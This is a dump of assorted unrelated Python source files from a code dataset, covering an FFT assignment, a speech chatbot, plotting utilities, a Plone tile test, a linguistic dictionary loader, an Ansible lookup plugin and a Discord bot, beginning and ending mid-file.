shuffle_bit_reversed_order(data: np.ndarray) -> np.ndarray:\n \"\"\"\n Shuffle elements of data using bit reversal of list index.\n\n Arguments:\n data: data to be transformed (shape=(n,), dtype='float64')\n\n Return:\n data: shuffled data array\n \"\"\"\n dataCopy = np.copy(data)\n i = 0\n while i < len(data):\n binaryIndex = bin(i).replace('0b', '')\n while len(binaryIndex) < np.log2([len(data)]):\n binaryIndex = '0' + binaryIndex\n binaryIndex = ''.join(reversed(binaryIndex))\n\n dataCopy[int(binaryIndex, 2)] = data[i]\n i = i + 1\n\n data = dataCopy\n\n return data\n\n\ndef fft(data: np.ndarray) -> np.ndarray:\n \"\"\"\n Perform real-valued discrete Fourier transform of data using fast Fourier transform.\n\n Arguments:\n data: data to be transformed (shape=(n,), dtype='float64')\n\n Return:\n fdata: Fourier transformed data\n\n Note:\n This is not an optimized implementation but one to demonstrate the essential ideas\n of the fast Fourier transform.\n\n Forbidden:\n - numpy.fft.*\n \"\"\"\n fdata = np.asarray(data, dtype='complex128')\n n = fdata.size\n if not n > 0 or (n & (n - 1)) != 0:\n raise ValueError\n\n # first step of FFT: shuffle data\n data = shuffle_bit_reversed_order(data)\n\n fdata = np.asarray(data, dtype='complex128')\n\n m = 0\n highTree = 0\n high = n\n while high > 1:\n high = high / 2\n highTree = highTree + 1\n\n while m < int(highTree):\n for k in range(0, 2 ** m):\n transformations = 0\n counter = 0\n while transformations < int(n / (2 ** (m + 1))):\n transformations = transformations + 1\n i = k + counter * (2 ** (m + 1))\n j = k + counter * (2 ** (m + 1)) + 2 ** m\n omega = (np.exp((-2 * np.pi * (1j) * k) / (2 ** (m + 1)))) * fdata[j]\n fdata[j] = fdata[i] - omega\n fdata[i] = fdata[i] + omega\n counter = counter + 1\n\n m = m + 1\n\n fdata = fdata / (np.sqrt(n))\n\n return fdata\n\n\ndef generate_tone(f: float = 261.626, num_samples: int = 44100) -> np.ndarray:\n \"\"\"\n Generate tone of length 1s with frequency f (default mid C: f = 261.626 Hz) and return the signal.\n\n Arguments:\n f: frequency of the tone\n\n Return:\n data: the generated signal\n \"\"\"\n\n # sampling range\n x_min = 0.0\n j = 0\n\n data = np.linspace(x_min, 2 * np.pi, num_samples)\n\n while j < num_samples:\n data[j] = np.sin(data[j] * f)\n\n j = j + 1\n\n return data\n\n\ndef low_pass_filter(adata: np.ndarray, bandlimit: int = 1000, sampling_rate: int = 44100) -> np.ndarray:\n \"\"\"\n Filter high frequencies above bandlimit.\n\n Arguments:\n adata: data to be filtered\n bandlimit: bandlimit in Hz above which to cut off frequencies\n sampling_rate: sampling rate in samples/second\n\n Return:\n adata_filtered: filtered data\n \"\"\"\n\n # translate band limit from Hz to data index according to sampling rate and data size\n bandlimit_index = int(bandlimit * adata.size / sampling_rate)\n\n # compute Fourier transform of input data\n newAdata = np.fft.fft(adata)\n # set high frequencies above band limit to zero, make sure the almost symmetry of the transform is respected.\n newAdata[bandlimit_index + 1: len(newAdata) - bandlimit_index] = 0\n # compute inverse transform and extract real component\n adata_filtered = np.fft.ifft(newAdata)\n adata_filtered = np.real(adata_filtered)\n\n return adata_filtered\n\n\nif __name__ == '__main__':\n print(\"All requested functions for the assignment have to be implemented in this file and uploaded to the \"\n \"server for the grading.\\nTo test your implemented functions you can \"\n \"implement/run tests in the file tests.py (> python3 -v test.py [Tests.]).\")\n","sub_path":"Project5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"179540387","text":"# n = 23\n# a,b,c = 11,12,9\n\n# Negative Case\n# n = 9\n# a,b,c = 2,2,2\n\n#Find the maximum number of pieces of n, that can be made suing these three length sizes a,b,c\n\nn = 5\na,b,c = 2,5,1\n\ndef helper(n,arr,res):\n if n == 0:\n res.append(arr)\n return res\n \n if n < 0:\n return res\n\n for x in [a,b,c]:\n helper(n - x, arr + [x], res)\n\n return res\n\nres = []\nhelper(n,[],res)\nprint(res)","sub_path":"Recursion/ropeCutting.py","file_name":"ropeCutting.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"630026599","text":"# -*- coding: utf-8 -*-\nfrom brasil.gov.tiles.testing import INTEGRATION_TESTING\nfrom brasil.gov.tiles.tiles.banner_rotativo import BannerRotativoTile\nfrom collective.cover.tiles.base import IPersistentCoverTile\nfrom plone.app.testing import setRoles\nfrom plone.app.testing import TEST_USER_ID\nfrom zope.component import getMultiAdapter\nfrom zope.interface.verify import verifyClass\nfrom zope.interface.verify import verifyObject\n\nimport unittest\n\n\nclass BannerRotativoTileTestCase(unittest.TestCase):\n\n layer = INTEGRATION_TESTING\n\n def setUp(self):\n self.portal = self.layer['portal']\n setRoles(self.portal, TEST_USER_ID, ['Manager'])\n self.request = self.layer['request']\n self.name = u\"banner_rotativo\"\n self.cover = self.portal['frontpage']\n self.tile = getMultiAdapter((self.cover, self.request), name=self.name)\n self.tile = self.tile['test']\n\n def test_interface(self):\n self.assertTrue(IPersistentCoverTile.implementedBy(BannerRotativoTile))\n self.assertTrue(verifyClass(IPersistentCoverTile, BannerRotativoTile))\n\n tile = BannerRotativoTile(None, None)\n self.assertTrue(IPersistentCoverTile.providedBy(tile))\n self.assertTrue(verifyObject(IPersistentCoverTile, tile))\n\n def test_default_configuration(self):\n self.assertFalse(self.tile.is_configurable)\n self.assertTrue(self.tile.is_droppable)\n self.assertTrue(self.tile.is_editable)\n\n def test_tile_is_empty(self):\n self.assertTrue(self.tile.is_empty())\n","sub_path":"src/brasil/gov/tiles/tests/test_bannerrotativo_tile.py","file_name":"test_bannerrotativo_tile.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"221408732","text":"import pyttsx3\nimport webbrowser\nimport smtplib\nimport random\nimport speech_recognition as sr\nimport wikipedia\nimport datetime\nimport time\n#youtubeimport wolframalpha\nimport os\nimport sys\nimport nltk\nimport io\nimport numpy as np\nimport random\nimport string\n#import sklern\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n#for opening and reading the file\ndef chatbot():\n engine = pyttsx3.init('espeak')\n\n def speak(audio):\n print('Computer: ' + audio)\n engine.say(audio)\n engine.runAndWait()\n\n path = '/home/p/Desktop/chatbot/pavan2.txt'\n f = open(path, 'r', errors='ignore')\n raw = f.read()\n raw = raw.lower() # converts to lower case\n # punkt and wordnet should be downloaded\n # nltk.download('punkt')#punkt used to convert the list of words to strings\n # nltk.download('wordnet')#used as a dictionary where nltk find meanings and synonyms\n sent_tokens = nltk.sent_tokenize(raw) # converts to list of sentenses\n word_tokens = nltk.word_tokenize(raw) # converts to list of words\n # for testing the sent_tokens and word_tokens\n '''a = word_tokens[:2]\n print(a)\n b = sent_tokens[:2]\n print(b)\n '''\n\n # preprossesing of text\n lemmer = nltk.stem.WordNetLemmatizer()\n\n # word net is an dictionary of english which is included in the nltk\n def LemTokens(tokens):\n return [lemmer.lemmatize(token) for token in tokens]\n\n remove_punct_dict = dict((ord(punct), None) for punct in string.punctuation)\n\n def LemNormalize(text): # here text is the user input\n return LemTokens(nltk.word_tokenize(text.lower().translate(remove_punct_dict)))\n\n # greeting\n GREETING_INPUT = (\"hello\", \"hai\", \"hi\", \"sup\", \"greetings\", \"hey\", \"what'sap\",)\n GREETING_OUTPUT = [\"hai\", \"hi\", \"hello\", \"hi there\", \"i am gland you are taking to me\"]\n\n def greeting(sentence):\n for word in sentence.split():\n if word.lower() in GREETING_INPUT:\n return random.choice(GREETING_OUTPUT)\n\n # vectorization for this we need to modules Tfidvectorizer and cosine_similarity\n # defining response\n def response(user_response):\n\n chatbot_response = ''\n sent_tokens.append(user_response)\n TfidVec = TfidfVectorizer(tokenizer=LemNormalize, stop_words='english')\n tfidf = TfidVec.fit_transform(\n sent_tokens) # calling fit transform method and passing the sent tokens here the send tokens are converted into a vector form\n vals = cosine_similarity(tfidf[-1],\n tfidf) # consine similarity for finding the similarity between the sentense tokens and user quations\n idx = vals.argsort()[0][-2]\n flat = vals.flatten() # for finding the matching btween quations and data stored in txt and converts it into a row matrix\n flat.sort()\n req_tfidf = flat[-2]\n if (req_tfidf != 0): # it means there is nothing matching between the quation and data\n chatbot_response = chatbot_response + sent_tokens[idx]\n return chatbot_response\n else:\n chatbot_response = chatbot_response + \" i am sorry idont understand you\"\n return chatbot_response\n\n flag = True\n print(\"chatbot:My name is chatbot.I will answer your quaries about global warming. if you want to exit ,type bye\")\n while (flag == True):\n r = sr.Recognizer()\n # url2 = 'https://www.youtube.com/'\n\n with sr.Microphone() as source:\n print(\"Listening...\")\n r.pause_threshold = 1\n url = r.listen(source)\n # get = str(input('Command: '))\n user_response = r.recognize_google(url, language='en')\n\n user_response = user_response.lower()\n if (user_response != 'bye' or 'exit'):\n if (user_response == 'thanks' or user_response == 'thank you'):\n flag = False\n print(\"chatbot:you are welcome..\")\n else:\n if (greeting(user_response) != None):\n print(\"chatbot:\" + greeting(user_response))\n else:\n print(\"chatbot:\", end=\"\")\n print(response(user_response))\n speak(response(user_response))\n\n sent_tokens.remove(user_response)\n else:\n flag = False\n print(\"chatbot: Bye! take care..\")\n # time.sleep(20)\nchatbot()","sub_path":"chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"490474158","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function, division\n\nimport tensorflow as tf\nimport numpy as np\nimport scipy.ndimage\nimport progressbar\n\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\n\n\ndef get_training_progressbar_fn(n_steps, loss_history, opt):\n widgets = [\n progressbar.Bar(),\n progressbar.Percentage(), ' |',\n progressbar.Timer(format='Elapsed: %(elapsed)s'), '|',\n progressbar.AdaptiveETA(), '|',\n progressbar.Variable('loss', width=6, precision=4), ', ',\n progressbar.Variable('lr', width=8, precision=3)\n ]\n bar = progressbar.ProgressBar(max_value=n_steps, widgets=widgets)\n\n def update_progressbar(i):\n loss = np.mean(loss_history[-50:])\n lr = float(opt._decayed_lr(tf.float32))\n bar.update(i+1, loss=loss, lr=lr)\n\n return update_progressbar\n\n\ndef plot_loss(loss_hist, val_loss_hist=None, lr_hist=None, smoothing='auto'):\n if smoothing == 'auto':\n n_smooth = np.clip(len(loss_hist)//16, 4, 128)\n else:\n n_smooth = smoothing\n\n def smooth_time_series(x):\n w = np.kaiser(2*n_smooth,5)\n w /= np.sum(w)\n x_conv = scipy.ndimage.convolve(x, w, mode='reflect')\n return x_conv\n\n loss_conv = smooth_time_series(loss_hist)\n if val_loss_hist is not None:\n val_loss_conv = smooth_time_series(val_loss_hist)\n\n n = np.arange(len(loss_hist))\n\n # Detect discrete drops in learning rate\n if lr_hist is not None:\n lr_hist = np.array(lr_hist)\n lr_ratio = lr_hist[1:] / lr_hist[:-1]\n n_drop = np.where(lr_ratio < 0.95)[0]\n\n fig,ax_arr = plt.subplots(1,2, figsize=(8,4))\n fig.subplots_adjust(\n left=0.14,\n right=0.98,\n wspace=0.25\n )\n\n for i,ax in enumerate(ax_arr):\n if i == 1:\n i0 = len(loss_hist) // 2\n loss_hist = loss_hist[i0:]\n loss_conv = loss_conv[i0:]\n if val_loss_hist is not None:\n val_loss_conv = val_loss_conv[i0:]\n if lr_hist is not None:\n lr_hist = lr_hist[i0:]\n n = n[i0:]\n\n if lr_hist is not None:\n for k in n_drop:\n ax.axvline(k, c='k', alpha=0.1, ls='--')\n\n l, = ax.plot(n, loss_hist, alpha=0.1, label=r'loss')\n ax.plot(\n n, loss_conv,\n alpha=0.8,\n color=l.get_color(),\n label=r'$\\mathrm{loss\\ (smoothed)}$'\n )\n if val_loss_hist is not None:\n ax.plot(\n n, val_loss_conv,\n alpha=0.8,\n label=r'$\\mathrm{validation\\ loss\\ (smoothed)}$'\n )\n\n ax.set_xlim(n[0], n[-1])\n\n ax.grid('on', which='major', alpha=0.25)\n ax.grid('on', which='minor', alpha=0.05)\n ax.set_ylabel(r'$\\mathrm{loss}$')\n ax.set_xlabel(r'$\\mathrm{training\\ step}$')\n if i == 0:\n ax.legend(loc='upper right')\n\n return fig\n\n\ndef batch_function(f, batch_size, base_library=tf):\n def g(x, *args, **kwargs):\n o = []\n n_data = x.shape[0]\n for batch in base_library.split(x, range(0,n_data,batch_size)):\n o.append(f(batch, *args, **kwargs))\n #for k in range(0, n_data, batch_size):\n # b0,b1 = k, k+batch_size\n # o.append(f(x[b0:b1], *args, **kwargs))\n return base_library.concatenate(o)\n\n\ndef append_to_loss_history(fname, key, loss_history):\n s = f'# {key}\\n'\n s += ' '.join(f'{x}' for x in loss_history) + '\\n'\n with open(fname, 'a') as f:\n f.write(s)\n ## Read existing data from JSON\n #if os.path.isfile(fname):\n # with open(fname, 'r') as f:\n # d = json.load(f)\n #else:\n # d = {}\n ## Append new data\n #d[key] = list(loss_history)\n ## Re-write data to JSON\n #with open(fname, 'w') as f:\n # f.dump(d, f)\n\n\ndef save_loss_history(fname, loss_history, val_loss_history=None, lr_history=None):\n data = [loss_history]\n header = f'{\"loss\": >16s}'\n if val_loss_history is not None:\n data.append(val_loss_history)\n header += f' {\"validation_loss\": >18s}'\n if val_loss_history is not None:\n data.append(lr_history)\n header += f' {\"learning_rate\": >18s}'\n data = np.stack(data, axis=1)\n np.savetxt(fname, data, header=header, fmt='%.12e')\n\n\ndef load_loss_history(fname):\n data = np.loadtxt(fname)\n loss_history = data[:,0].tolist()\n val_loss_history = data[:,1].tolist()\n lr_history = data[:,2].tolist()\n return loss_history, val_loss_history, lr_history\n\n\ndef plot_corr(ax, x, y,\n x_lim=None, d_max=None,\n bins=(50,31), pct=(16,50,84),\n normalization='balanced'):\n if x_lim is None:\n x_min, x_max = np.min(x), np.max(x)\n # w = x_max - x_min\n xlim = (x_min, x_max)\n else:\n xlim = x_lim\n\n if d_max is None:\n dmax = 1.2 * np.percentile(np.abs(y-x), 99.9)\n else:\n dmax = d_max\n dlim = (-dmax, dmax)\n\n d = y - x\n n,x_edges,_ = np.histogram2d(x, d, range=(xlim, dlim), bins=bins)\n\n if normalization == None:\n norm = np.ones(n.shape[0])\n elif normalization == 'sum':\n norm = np.sum(n, axis=1) + 1.e-10\n elif normalization == 'max':\n norm = np.max(n, axis=1) + 1.e-10\n elif normalization == 'balanced':\n norm0 = np.sum(n, axis=1)\n norm1 = np.max(n, axis=1)\n norm = np.sqrt(norm0*norm1) + 1.e-10\n else:\n raise ValueError(f'Unrecognized normalization: \"{normalization}\"')\n n /= norm[:,None]\n\n #n = n**gamma\n\n ax.imshow(\n n.T,\n origin='lower',\n interpolation='nearest',\n aspect='auto',\n extent=xlim+dlim,\n cmap='binary'\n )\n ax.plot(xlim, [0.,0.], c='b', alpha=0.2, lw=1)\n\n if len(pct):\n x_pct = np.empty((3, len(x_edges)-1))\n for i,(x0,x1) in enumerate(zip(x_edges[:-1],x_edges[1:])):\n idx = (x > x0) & (x < x1)\n if np.any(idx):\n x_pct[:,i] = np.percentile(d[idx], pct)\n else:\n x_pct[:,i] = np.nan\n \n for i,x_env in enumerate(x_pct):\n ax.step(\n x_edges,\n np.hstack([x_env[0], x_env]),\n c='cyan',\n alpha=0.5\n )\n\n ax.set_xlim(xlim)\n ax.set_ylim(dlim)\n\n\ndef hist2d_mean(ax, x, y, c,\n vmin=None, vmax=None, cmap=None,\n bins=10, range=None):\n kw = dict(bins=bins, range=range, density=False)\n nc,xedges,yedges = np.histogram2d(x, y, weights=c, **kw)\n n,_,_ = np.histogram2d(x, y, **kw)\n img = nc / n\n\n extent = (\n xedges[0], xedges[-1],\n yedges[0], yedges[-1]\n )\n\n im = ax.imshow(\n img.T,\n extent=extent,\n origin='lower',\n aspect='auto',\n interpolation='nearest',\n vmin=vmin,\n vmax=vmax,\n cmap=cmap\n )\n\n return im\n\n\ndef main():\n rng = np.random.default_rng()\n\n x = [rng.uniform(0., 0.1, 1000), rng.uniform(0., 1.0, 1000)]\n y = [rng.uniform(0., 1.0, 1000), rng.uniform(0., 0.1, 1000)]\n c = [np.ones(1000), -1 * np.ones(1000)]\n\n x = np.hstack(x)\n y = np.hstack(y)\n c = np.hstack(c)\n\n fig,ax = plt.subplots(1,1, figsize=(4,3), dpi=200)\n\n im = hist2d_mean(\n ax, x, y, c,\n vmin=-1, vmax=1,\n cmap='coolwarm_r',\n bins=10, range=[(0,1),(0,1)]\n )\n\n fig.colorbar(im, ax=ax)\n\n fig.savefig('hist2d_mean_example.png', dpi=200)\n\n return 0\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"scripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"510798146","text":"# coding: utf8\nfrom __future__ import unicode_literals\nimport re\nfrom datetime import date\n\nfrom sqlalchemy import create_engine\nfrom path import path\nfrom clld.db.meta import DBSession\nfrom clld.db.models import common\nfrom clld.util import slug\n\nimport dictionaria\nfrom dictionaria import models\nfrom dictionaria.lib.sfm import Dictionary\n\n\nDB = 'postgresql://robert@/wold'\nPOS_MAP = {\n 'n adj': 'noun',\n 'vi': 'inactive verb',\n 'num': 'numeral',\n 'vt': 'transitive verb',\n 'conj': 'other',\n 'vt vi': 'verb',\n 'adv': 'adverb',\n 'pron': 'pronoun',\n 'neg': 'other',\n 'pron (resp)': 'pronoun',\n 'deic': 'other',\n 'quant': 'other',\n 'adj': 'adjective',\n 'prep': 'other',\n 'qmrk': 'other',\n 'wh': 'other',\n 'Q': 'other',\n 'part': 'other',\n 'vdt': 'other',\n 'det': 'other',\n 'n': 'noun',\n 'q': 'other',\n 'pron (conf)': 'pronoun',\n 'v': 'verb',\n}\n\n\ndef load(id_, data):\n d = Dictionary(path(__file__).dirname().joinpath('yalalag.bak'), encoding='latin1')\n d.entries = filter(lambda r: r.get('lx') and r.get('ge'), d.entries)\n\n lang = data.add(common.Language, id_, id=id_, name='Yalálag Zapotec',\n latitude=17.18574, longitude=-96.17891)\n #\n # TODO:\n #\n # iso code zpu\n contrib = data.add(\n common.Contributor, 'heriberto', id='avelinoheriberto', name='Heriberto Avelino')\n DBSession.flush()\n\n number = max([int(dd.id) for dd in data['Dictionary'].values()] + [0])\n vocab = data.add(\n models.Dictionary, id_, id=str(number + 1),\n name='Yalálag Zapotec Dictionary',\n language=lang,\n published=date(2013, 5, 5))\n DBSession.flush()\n\n DBSession.add(common.Contribution_files(\n object_pk=vocab.pk,\n name='description',\n file=common.File(\n name='yalalag.pdf',\n mime_type='application/pdf',\n content=open(path(__file__).dirname().joinpath('yalalag.pdf')).read())))\n\n old_db = create_engine(DB)\n for row in old_db.execute(\"select * from meaning\"):\n data.add(\n common.ValueSet, '%s-%s' % (row['label'].lower(), id_),\n id='%s-%s' % (id_, row['id'].replace('.', '-')),\n language=lang,\n contribution=vocab,\n parameter=data['Meaning'][row['id']])\n\n DBSession.flush()\n\n ue = common.UnitParameter(id='ue', name='usage')\n DBSession.add(ue)\n DBSession.flush()\n\n for name in d.values('ue'):\n p = data.add(common.UnitDomainElement, name, id='ue-'+slug(name), name=name)\n p.unitparameter_pk = ue.pk\n\n for i, row in enumerate(d.entries):\n w = data.add(\n models.Word, row.get('lx'),\n id='%s-%s' % (id_, i),\n name=row.get('lx'),\n description='; '.join(row.getall('ge')),\n dictionary=vocab)\n w.language = lang\n\n DBSession.flush()\n\n for marker in [\n 'bw', 'ce', 'cf', 'de', 'dn', 'et', 'gv', 'lc', 'mr', 'nt',\n 'ph', 're', 'rn', 'sc', 'se', 'un', 'va',\n ]:\n for k, name in enumerate(row.getall(marker)):\n DBSession.add(\n common.Unit_data(key=marker, value=name, ord=k, object_pk=w.pk))\n\n for j, name in enumerate(row.getall('ue')):\n DBSession.add(common.UnitValue(\n id='ue-%s-%s' % (i, j),\n unit=w,\n unitparameter=ue,\n unitdomainelement=data['UnitDomainElement'][name],\n contribution=vocab,\n ))\n\n meaning_prefix = ''\n for j, name in enumerate(row.getall('ps')):\n if POS_MAP[name] == 'verb' or ' verb' in POS_MAP[name]:\n meaning_prefix = 'to '\n elif POS_MAP[name] == 'noun':\n meaning_prefix = 'the '\n if j > 0:\n # only one part-of-speech value per entry!\n raise ValueError\n DBSession.add(common.UnitValue(\n id='pos-%s-%s' % (id_, i),\n unit=w,\n unitparameter=data['UnitParameter']['pos'],\n unitdomainelement=data['UnitDomainElement'][POS_MAP[name]],\n contribution=vocab,\n ))\n\n for j, name in enumerate(row.getall('ge')):\n if name.startswith(meaning_prefix):\n meaning_prefix = ''\n key = '%s%s-%s' % (meaning_prefix, name.lower(), id_)\n if key in data['ValueSet']:\n value = data.add(\n models.Counterpart, '%s-%s' % (i, j),\n id='%s-%s-%s' % (id_, i, j),\n name=row.get('lx'),\n valueset=data['ValueSet'][key],\n word=w)\n\n if row.get('xv'):\n ex = data.add(\n common.Sentence, i,\n id='%s-%s' % (id_, i),\n name=row.get('xv'),\n description=row.get('xe', default=''))\n DBSession.add(models.WordSentence(word=w, sentence=ex))\n\n DBSession.flush()\n\n DBSession.add(common.ContributionContributor(\n ord=1,\n primary=True,\n contributor_pk=contrib.pk,\n contribution_pk=vocab.pk))\n\n DBSession.flush()\n","sub_path":"dictionaria/loader/ayalalag.py","file_name":"ayalalag.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"213568888","text":"# python 3 headers, required if submitting to Ansible\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nDOCUMENTATION = \"\"\"\n lookup: file\n author: Daniel Hokka Zakrisson \n version_added: \"0.9\"\n short_description: read file contents\n description:\n - This lookup returns the contents from a file on the Ansible controller's file system.\n options:\n _terms:\n description: path(s) of files to read\n required: True\n notes:\n - if read in variable context, the file can be interpreted as YAML if the content is valid to the parser.\n - this lookup does not understand globing --- use the fileglob lookup instead.\n\"\"\"\nfrom ansible.errors import AnsibleError, AnsibleParserError\nfrom ansible.module_utils._text import to_text\nfrom ansible.plugins.lookup import LookupBase\nfrom ansible.utils.display import Display\n\ndisplay = Display()\n\n\nclass LookupModule(LookupBase):\n\n def run(self, terms, variables=None, **kwargs):\n\n\n # lookups in general are expected to both take a list as input and output a list\n # this is done so they work with the looping construct 'with_'.\n ret = []\n\n image = kwargs['image']\n try:\n if '@' in image:\n repo = image.split('@')[0]\n ret.append(to_text(repo))\n elif ':' in image:\n repo = image.split(':')[0]\n ret.append(to_text(repo))\n else:\n ret.append(to_text(image))\n except AnsibleParserError:\n raise AnsibleError(\"could not locate file in lookup: %s\" % term)\n return ret\n","sub_path":"plugins/lookup/image_repo.py","file_name":"image_repo.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"526169817","text":"# https://dmoj.ca/problem/dmopc18c2p4\n# https://dmoj.ca/submission/2948484\n\nfrom sys import exit\nn,m = tuple(map(int,input().split()))\ndamage = list(map(int,input().split()))\nfor i in range(1,n):\n damage[i] += damage[i-1]\n\nif damage[-1] < m:\n print(-1)\n exit(0)\n\nshortest = n\ndamage = [0]+damage\n\ni = 0\nj = 1\nwhile i < n+1 > j:\n if damage[j] - damage[i] < m:\n j+=1\n else:\n i+=1\n shortest = min(shortest,j-i)\nprint(shortest+1)\n","sub_path":"dmoj/DMOPC/dmopc18c2p4.py","file_name":"dmopc18c2p4.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"149572756","text":"import logging\nimport sys\nimport inspect\n\n# logging.basicConfig(stream=sys.stdout, level=logging.INFO, format='%(asctime)s - %(message)s')\n# logging.basicConfig(stream=sys.stdout, level=logging.INFO, \n# format='%(asctime)s %(filename)s:%(lineno)d - %(message)s')\nlogging.basicConfig(stream=sys.stdout, level=logging.INFO, format='- %(message)s')\n\ndef prefix():\n callerframerecord = inspect.stack()[2]\n frame = callerframerecord[0]\n info = inspect.getframeinfo(frame)\n txt = '{}:{}'.format(info.filename,info.lineno)\n return txt\n\ndef info(msg):\n logging.info(\"{} {}\".format(prefix(), msg))\n\n# display once each message\nonceMarkers = []\ndef once(msg):\n marker = prefix()\n if (marker not in onceMarkers):\n onceMarkers.append(marker)\n logging.info(\"{} {}\".format(marker, msg))\n\n# input x must be tensor\ndef describe(x):\n logging.info(\"{} Type {},Shape{},Value:\\n{}\".format(prefix(),x.type(),x.shape,x))\n# input x must be tensor\ndescribeOnceMarkers = []\ndef describeOnce(x):\n marker = prefix()\n if (marker not in describeOnceMarkers):\n describeOnceMarkers.append(marker)\n logging.info(\"{} Type {},Shape{},Value:\\n{}\".format(prefix(),x.type(),x.shape,x))\n\n\n ","sub_path":"py/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"504854859","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom discord.ext import commands\n\nclient = commands.Bot(command_prefix = '$')\n\n@client.event\nasync def on_ready():\n print(\"bot online\")\n\n@client.command()\nasync def ping(message):\n await message.send(\"pong!\")\n\n\nclient.run(os.getenv(\"DISCORD_TOKEN\")) #get your bot token and make a file called \".env\" then inside the file write TOKEN=put your api key here example in env.txt\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"229665875","text":"\n\n#calss header\nclass _REFORM():\n\tdef __init__(self,): \n\t\tself.name = \"REFORM\"\n\t\tself.definitions = [u\"to make an improvement, especially by changing a person's behaviour or the structure of something: \"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_reform.py","file_name":"_reform.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"183038819","text":"# This script processes the RSS data collected during the ground-truth phase. A\n# person stood inside squares on the floor and moved around for 30 seconds. He\n# then moved to the next square on the path.\n#\n# The purpose of this script is to compute the histograms, mean, and variance \n# for each link-box pair. A sister-script ground_truth_viewer.py can then be\n# run to look at an image of the room according to a links mean RSS value.\n#\n# We hope to then run a separate script that will estimate the ground truth \n# statistics. We can then compare images.\n\nimport numpy as np\n\n# This function takes the current line from \ndef parse_line(line):\n line_out = line.split(' ')\n tmp = np.array([float(item) for item in line_out])\n rss = tmp[:-1]\n time_stamp = tmp[-1]\n return rss, time_stamp\n\n# File names for data\nrss_fname = 'data/rss_data/rs_room/rss_rs_room_ground_truth.txt'\nnode_loc_fname = 'data/node_loc_data/rs_room/node_loc_2016_08_30.txt'\npivot_coord_fname = 'data/true_loc_data/rs_room/pivot_coords_2016_08_30.txt'\npivot_idx_fname = 'data/true_loc_data/rs_room/pivot_idx_gt_2016_08_30.txt'\n\n# File names for results\nmean_mat_fname = 'data/results/rs_room/mean_mat.txt'\nmed_mat_fname = 'data/results/rs_room/median_mat.txt'\nvar_mat_fname = 'data/results/rs_room/var_mat.txt'\niqr_mat_fname = 'data/results/rs_room/iqr_mat.txt'\n\n# Get the coordinates for each box\npivot_coords = np.loadtxt(pivot_coord_fname)\npivot_coords_x = np.unique(pivot_coords[:,0])\npivot_coords_y = np.unique(pivot_coords[:,1])\nxv,yv = np.meshgrid(pivot_coords_x,pivot_coords_y)\nxvf = xv.flatten()\nyvf = yv.flatten()\n\n# Get the pivot indexes\npivot_idx = np.loadtxt(pivot_idx_fname).astype('int')\n\n# Initialize some variables\nt0 = 0. # time zero\ncur_box_idx = -3 # the current box we are in\nhigh_time = 30.\n\n\n# loop through each line of the ground truth rss file\nwith open(rss_fname,'r') as f:\n for line in f:\n \n # Parse the rss and time stamp from the current measurement\n rss, time_stamp = parse_line(line)\n \n # Get the zeroed time stamp, and set variables that need to be\n # initialized on the first measurement\n if t0 == 0.:\n t0 = time_stamp\n \n mean_mat = np.zeros((rss.size,xvf.size+1))\n med_mat = np.zeros((rss.size,xvf.size+1))\n var_mat = -1*np.ones((rss.size,xvf.size+1))\n iqr_mat = -1*np.ones((rss.size,xvf.size+1))\n \n rss_buffer = np.zeros((rss.size,300))\n cur_buffer_idx = 0\n cur_time = time_stamp-t0\n \n # Enter here if we made a transition to the next box. In this block, we \n # compute the mean and variance of the last 30 seconds of RSS and then\n # save these statistics to the matrix holding the means and variances\n # for each link and pixel\n if cur_time>high_time:\n \n # Change 127 values to NAN so that we can easily compute the mean \n # and variance\n rss_buffer[rss_buffer == 127.] = np.NAN\n tmp_mean = np.nanmean(rss_buffer[:,:cur_buffer_idx-1],axis=1)[np.newaxis]\n tmp_var = np.nanvar(rss_buffer[:,:cur_buffer_idx-1],axis=1)[np.newaxis]\n tmp_med = np.nanmedian(rss_buffer[:,:cur_buffer_idx-1],axis=1)[np.newaxis]\n tmp_iqr = np.diff(np.nanpercentile(rss_buffer[:,:cur_buffer_idx-1], [25, 75],axis=1))\n \n # This is a place holder so that I can eventually put in the code\n # to save histograms for each pixel and link pair\n # save_histograms()\n \n # If we are at the vacant room index or occupied box index, get the \n # correct pixel index and save the 